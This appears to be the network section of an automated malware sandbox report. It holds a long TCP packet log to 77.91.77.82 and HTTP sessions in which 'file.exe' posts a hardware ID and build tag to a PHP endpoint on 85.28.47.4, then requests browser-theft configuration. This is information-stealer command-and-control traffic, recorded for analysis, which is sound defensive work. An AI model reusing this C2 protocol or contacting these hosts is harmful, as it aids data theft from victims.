                                                                Jul 3, 2024 08:41:52.613634109 CEST4996980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:52.614175081 CEST4996980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:52.619002104 CEST804996977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:53.301791906 CEST804996977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:53.305170059 CEST4996980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:53.308170080 CEST4996980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:53.308170080 CEST4997080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:53.313535929 CEST804997077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:53.313829899 CEST804996977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:53.317163944 CEST4996980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:53.317163944 CEST4997080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:53.317358017 CEST4997080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:53.322232962 CEST804997077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.006582975 CEST804997077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.006675005 CEST4997080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.112566948 CEST4997080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.112922907 CEST4997180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.117749929 CEST804997177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.117806911 CEST804997077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.117814064 CEST4997180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.117860079 CEST4997080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.118195057 CEST4997180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.122988939 CEST804997177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.803565025 CEST804997177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.803678989 CEST4997180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.806549072 CEST4997180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.806936026 CEST4997280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.811732054 CEST804997177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.811759949 CEST804997277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:54.811820030 CEST4997180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.811860085 CEST4997280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.812177896 CEST4997280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:54.816981077 CEST804997277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:55.509568930 CEST804997277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:55.509640932 CEST4997280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:55.628722906 CEST4997280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:55.629214048 CEST4997380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:55.633821964 CEST804997277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:55.633872986 CEST4997280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:55.634038925 CEST804997377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:55.634107113 CEST4997380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:55.634386063 CEST4997380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:55.639209986 CEST804997377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:56.509578943 CEST804997377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:56.512226105 CEST4997380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:56.515131950 CEST4997380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:56.515324116 CEST4997480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:56.520104885 CEST804997477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:56.520268917 CEST804997377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:56.523627996 CEST4997480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:56.523627996 CEST4997380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:56.523847103 CEST4997480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:56.528614044 CEST804997477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:57.231349945 CEST804997477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:57.235395908 CEST4997480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:57.345829964 CEST4997480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:57.347131968 CEST4997580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:57.353367090 CEST804997477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:57.354357004 CEST804997577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:57.355195045 CEST4997580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:57.355200052 CEST4997480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:57.355403900 CEST4997580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:57.362293959 CEST804997577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.039238930 CEST804997577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.039308071 CEST4997580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.042975903 CEST4997580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.043422937 CEST4997680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.048439026 CEST804997677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.048499107 CEST4997680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.048574924 CEST804997577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.048624992 CEST4997580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.049196959 CEST4997680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.053972960 CEST804997677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.739579916 CEST804997677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.739694118 CEST4997680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.846155882 CEST4997680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.846167088 CEST4997780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.851118088 CEST804997777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.853070021 CEST804997677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:58.855226994 CEST4997680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.855230093 CEST4997780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.855326891 CEST4997780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:58.860167027 CEST804997777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:59.546786070 CEST804997777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:59.546875000 CEST4997780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:59.550473928 CEST4997780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:59.550992012 CEST4997880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:59.555747032 CEST804997777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:59.555759907 CEST804997877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:41:59.555799007 CEST4997780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:59.555830956 CEST4997880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:59.556056976 CEST4997880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:41:59.560892105 CEST804997877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:00.030900955 CEST4997880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.144989014 CEST4997980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.149868011 CEST804997977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:00.149950027 CEST4997980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.150454998 CEST4997980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.155427933 CEST804997977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:00.843260050 CEST804997977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:00.843358994 CEST4997980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.847076893 CEST4997980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.847477913 CEST4998080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.852915049 CEST804998077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:00.853007078 CEST804997977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:00.853039980 CEST4998080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.853072882 CEST4997980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.853677988 CEST4998080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:00.858710051 CEST804998077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:01.559484005 CEST804998077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:01.559537888 CEST4998080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:01.675375938 CEST4998080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:01.675682068 CEST4998180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:01.680628061 CEST804998077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:01.680643082 CEST804998177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:01.680684090 CEST4998080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:01.680748940 CEST4998180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:01.681128979 CEST4998180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:01.685950041 CEST804998177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:02.374289036 CEST804998177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:02.374351025 CEST4998180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:02.377844095 CEST4998180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:02.378256083 CEST4998280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:02.383111954 CEST804998177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:02.383126974 CEST804998277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:02.383162022 CEST4998180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:02.383220911 CEST4998280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:02.383481026 CEST4998280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:02.388267994 CEST804998277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.080522060 CEST804998277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.080818892 CEST4998280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.189722061 CEST4998280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.190116882 CEST4998380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.194875956 CEST804998277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.194914103 CEST804998377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.194958925 CEST4998280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.195069075 CEST4998380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.195241928 CEST4998380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.200159073 CEST804998377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.870027065 CEST804998377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.870093107 CEST4998380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.873723030 CEST4998380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.873955011 CEST4998480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.878855944 CEST804998477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.878920078 CEST4998480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.878966093 CEST804998377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:03.879018068 CEST4998380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.879153013 CEST4998480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:03.883919954 CEST804998477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:04.558526039 CEST804998477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:04.561224937 CEST4998480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:04.673958063 CEST4998480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:04.675390959 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:04.679392099 CEST804998477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:04.680285931 CEST4998480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:04.680452108 CEST804998577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:04.685194969 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:04.687768936 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:04.692583084 CEST804998577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.113519907 CEST804998577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.113632917 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.113925934 CEST804998577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.113970041 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.114181042 CEST804998577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.114223003 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.117225885 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.117515087 CEST4998680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.123368979 CEST804998677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.123436928 CEST4998680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.123573065 CEST4998680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.125709057 CEST804998577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.125757933 CEST4998580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.128388882 CEST804998677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.833583117 CEST804998677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:06.837452888 CEST4998680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.955604076 CEST4998680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:06.955602884 CEST4998780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.095222950 CEST804998777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:07.095235109 CEST804998677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:07.095303059 CEST4998780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.095375061 CEST4998680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.095743895 CEST4998780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.106369972 CEST804998777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:07.806379080 CEST804998777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:07.806451082 CEST4998780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.809557915 CEST4998780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.809916019 CEST4998880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.815471888 CEST804998877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:07.815536976 CEST4998880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.815675020 CEST4998880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.815903902 CEST804998777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:07.815948963 CEST4998780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:07.820692062 CEST804998877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:08.526833057 CEST804998877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:08.527039051 CEST4998880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:08.642781019 CEST4998880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:08.642781973 CEST4998980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:08.647819996 CEST804998977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:08.648370028 CEST804998877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:08.648473978 CEST4998880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:08.648473024 CEST4998980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:08.648698092 CEST4998980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:08.653824091 CEST804998977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:09.343461990 CEST804998977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:09.343560934 CEST4998980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:09.347060919 CEST4998980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:09.347803116 CEST4999080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:09.352256060 CEST804998977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:09.352407932 CEST4998980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:09.352623940 CEST804999077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:09.353127003 CEST4999080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:09.353435040 CEST4999080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:09.358247995 CEST804999077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.060085058 CEST804999077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.060152054 CEST4999080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.174766064 CEST4999080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.175117016 CEST4999180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.179979086 CEST804999077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.179996014 CEST804999177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.180037975 CEST4999080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.180088043 CEST4999180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.180561066 CEST4999180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.185517073 CEST804999177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.853885889 CEST804999177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.853996992 CEST4999180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.856874943 CEST4999180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.857290030 CEST4999280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.862202883 CEST804999277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.862360001 CEST4999280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.862665892 CEST4999280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:10.867562056 CEST804999277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.869309902 CEST804999177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:10.869508028 CEST4999180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.570450068 CEST804999277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:11.570558071 CEST4999280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.695915937 CEST4999280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.696261883 CEST4999380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.701224089 CEST804999377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:11.701287031 CEST4999380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.701411963 CEST804999277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:11.701458931 CEST4999280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.702186108 CEST4999380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:11.707026958 CEST804999377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:12.387713909 CEST804999377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:12.387780905 CEST4999380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:12.392016888 CEST4999380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:12.392292023 CEST4999480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:12.397567987 CEST804999377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:12.397624969 CEST4999380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:12.397774935 CEST804999477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:12.397836924 CEST4999480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:12.398341894 CEST4999480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:12.403687954 CEST804999477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.081190109 CEST804999477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.081273079 CEST4999480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.191087961 CEST4999580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.191090107 CEST4999480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.196166039 CEST804999577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.196285009 CEST4999580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.196423054 CEST804999477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.196607113 CEST4999480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.196664095 CEST4999580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.203352928 CEST804999577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.917937040 CEST804999577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.917995930 CEST4999580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.921684027 CEST4999580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.922049046 CEST4999680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.926954985 CEST804999577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.926973104 CEST804999677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:13.927011013 CEST4999580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.927059889 CEST4999680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.927186012 CEST4999680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:42:13.932777882 CEST804999677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:14.637795925 CEST804999677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:42:14.637958050 CEST4999680192.168.2.677.91.77.82
                                                                • 85.28.47.4
                                                                • 77.91.77.81
                                                                • 77.91.77.82
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.64971085.28.47.4802104C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:38:08.804822922 CEST408OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA
                                                                Host: 85.28.47.4
                                                                Content-Length: 211
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 35 35 43 34 37 42 36 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a
                                                                Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="hwid"E8855C47B6BC4158135236------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="build"jony------JEHJKJEBGHJJKEBGIECA--
                                                                Jul 3, 2024 08:38:09.439043045 CEST384INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 156
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 5a 6a 45 34 4d 7a 68 6d 4d 6d 45 34 4f 54 45 33 5a 57 51 77 4f 47 52 6a 4e 57 4a 6a 5a 6a 59 31 4f 44 6c 6d 4f 44 49 35 4d 54 41 31 5a 6a 55 35 4d 6a 67 34 59 32 4a 6d 5a 44 45 77 4d 54 42 69 4e 6a 6b 35 59 32 55 30 4d 47 51 33 4d 54 59 77 5a 6a 55 34 4d 44 4d 78 4e 7a 55 32 4e 6a 51 35 66 47 70 69 5a 48 52 68 61 57 70 76 64 6d 64 38 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                Data Ascii: ZjE4MzhmMmE4OTE3ZWQwOGRjNWJjZjY1ODlmODI5MTA1ZjU5Mjg4Y2JmZDEwMTBiNjk5Y2U0MGQ3MTYwZjU4MDMxNzU2NjQ5fGpiZHRhaWpvdmd8ZWltZWhydnpvZC5maWxlfDB8MHwxfDF8MXwxfDF8MXw=
                                                                Jul 3, 2024 08:38:09.512644053 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE
                                                                Host: 85.28.47.4
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 2d 2d 0d 0a
                                                                Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="message"browsers------HCGCBFHCFCFBFIEBGHJE--
                                                                Jul 3, 2024 08:38:09.689672947 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 1520
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
